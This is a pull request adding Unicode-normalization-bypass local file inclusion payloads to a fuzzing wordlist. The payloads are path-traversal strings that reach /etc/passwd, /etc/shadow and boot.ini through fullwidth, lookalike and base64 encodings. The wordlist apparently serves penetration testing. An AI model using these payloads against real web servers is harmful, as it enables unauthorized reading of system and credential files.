### PR TITLE
Unicode encoded LFI payload

### DIFF
--- a/Fuzzing/LFI/LFI-Jhaddix.txt
+++ b/Fuzzing/LFI/LFI-Jhaddix.txt
@@ -915,3 +915,5 @@ Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4v
 %e2%80%a5%ef%bc%8f%e2%80%a5%ef%bc%8f%e2%80%a5%ef%bc%8f%e2%80%a5%ef%bc%8f%e2%80%a5%ef%bc%8f%ef%bd%85%ef%bd%94%e2%85%bd%ef%bc%8f%ef%bd%90%ef%bd%81%ef%bd%93%ef%bd%93%ef%bd%97%e2%85%be
 ..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f..%ef%bc%8fetc%ef%bc%8fpasswd
 %e2%80%a5%ef%b9%a8%e2%80%a5%ef%b9%a8%e2%80%a5%ef%b9%a8%e2%80%a5%ef%b9%a8%e2%80%a5%ef%b9%a8%e2%80%a5%ef%b9%a8%e2%80%a5%ef%b9%a8%ef%bd%82%ef%bd%8f%ef%bd%8f%ef%bd%94%e2%80%a4%e2%85%b0%ef%bd%8e%e2%85%b0
+..%ef%b9%a8..%ef%b9%a8..%ef%b9%a8..%ef%b9%a8..%ef%b9%a8..%ef%b9%a8boot.ini
+..%ef%bc%bc..%ef%bc%bc..%ef%bc%bc..%ef%bc%bc..%ef%bc%bc..%ef%bc%bc..%ef%bc%bcboot.ini

--- a/Fuzzing/LFI/LFI-Jhaddix.txt
+++ b/Fuzzing/LFI/LFI-Jhaddix.txt
@@ -917,3 +917,4 @@ Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4v
 %e2%80%a5%ef%b9%a8%e2%80%a5%ef%b9%a8%e2%80%a5%ef%b9%a8%e2%80%a5%ef%b9%a8%e2%80%a5%ef%b9%a8%e2%80%a5%ef%b9%a8%e2%80%a5%ef%b9%a8%ef%bd%82%ef%bd%8f%ef%bd%8f%ef%bd%94%e2%80%a4%e2%85%b0%ef%bd%8e%e2%85%b0
 ..%ef%b9%a8..%ef%b9%a8..%ef%b9%a8..%ef%b9%a8..%ef%b9%a8..%ef%b9%a8boot.ini
 ..%ef%bc%bc..%ef%bc%bc..%ef%bc%bc..%ef%bc%bc..%ef%bc%bc..%ef%bc%bc..%ef%bc%bcboot.ini
+///////../../../etc/passwd

--- a/Fuzzing/LFI/LFI-Jhaddix.txt
+++ b/Fuzzing/LFI/LFI-Jhaddix.txt
@@ -912,3 +912,4 @@ Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4v
 Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
 Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
 Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3NoYWRvdyUwMA==
+%e2%80%a5%ef%bc%8f%e2%80%a5%ef%bc%8f%e2%80%a5%ef%bc%8f%e2%80%a5%ef%bc%8f%e2%80%a5%ef%bc%8f%ef%bd%85%ef%bd%94%e2%85%bd%ef%bc%8f%ef%bd%90%ef%bd%81%ef%bd%93%ef%bd%93%ef%bd%97%e2%85%be

--- a/Fuzzing/LFI/LFI-Jhaddix.txt
+++ b/Fuzzing/LFI/LFI-Jhaddix.txt
@@ -913,3 +913,4 @@ Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4v
 Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
 Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3NoYWRvdyUwMA==
 %e2%80%a5%ef%bc%8f%e2%80%a5%ef%bc%8f%e2%80%a5%ef%bc%8f%e2%80%a5%ef%bc%8f%e2%80%a5%ef%bc%8f%ef%bd%85%ef%bd%94%e2%85%bd%ef%bc%8f%ef%bd%90%ef%bd%81%ef%bd%93%ef%bd%93%ef%bd%97%e2%85%be
+%e2%80%a5%ef%b9%a8%e2%80%a5%ef%b9%a8%e2%80%a5%ef%b9%a8%e2%80%a5%ef%b9%a8%e2%80%a5%ef%b9%a8%e2%80%a5%ef%b9%a8%e2%80%a5%ef%b9%a8%ef%bd%82%ef%bd%8f%ef%bd%8f%ef%bd%94%e2%80%a4%e2%85%b0%ef%bd%8e%e2%85%b0

--- a/Fuzzing/LFI/LFI-Jhaddix.txt
+++ b/Fuzzing/LFI/LFI-Jhaddix.txt
@@ -913,4 +913,5 @@ Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4v
 Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
 Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3NoYWRvdyUwMA==
 %e2%80%a5%ef%bc%8f%e2%80%a5%ef%bc%8f%e2%80%a5%ef%bc%8f%e2%80%a5%ef%bc%8f%e2%80%a5%ef%bc%8f%ef%bd%85%ef%bd%94%e2%85%bd%ef%bc%8f%ef%bd%90%ef%bd%81%ef%bd%93%ef%bd%93%ef%bd%97%e2%85%be
+..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f..%ef%bc%8fetc%ef%bc%8fpasswd
 %e2%80%a5%ef%b9%a8%e2%80%a5%ef%b9%a8%e2%80%a5%ef%b9%a8%e2%80%a5%ef%b9%a8%e2%80%a5%ef%b9%a8%e2%80%a5%ef%b9%a8%e2%80%a5%ef%b9%a8%ef%bd%82%ef%bd%8f%ef%bd%8f%ef%bd%94%e2%80%a4%e2%85%b0%ef%bd%8e%e2%85%b0


### PR DESCRIPTION
A few Unicode encoded payloads to bypass filters when a web server exposed to unicode normalization vulnerability.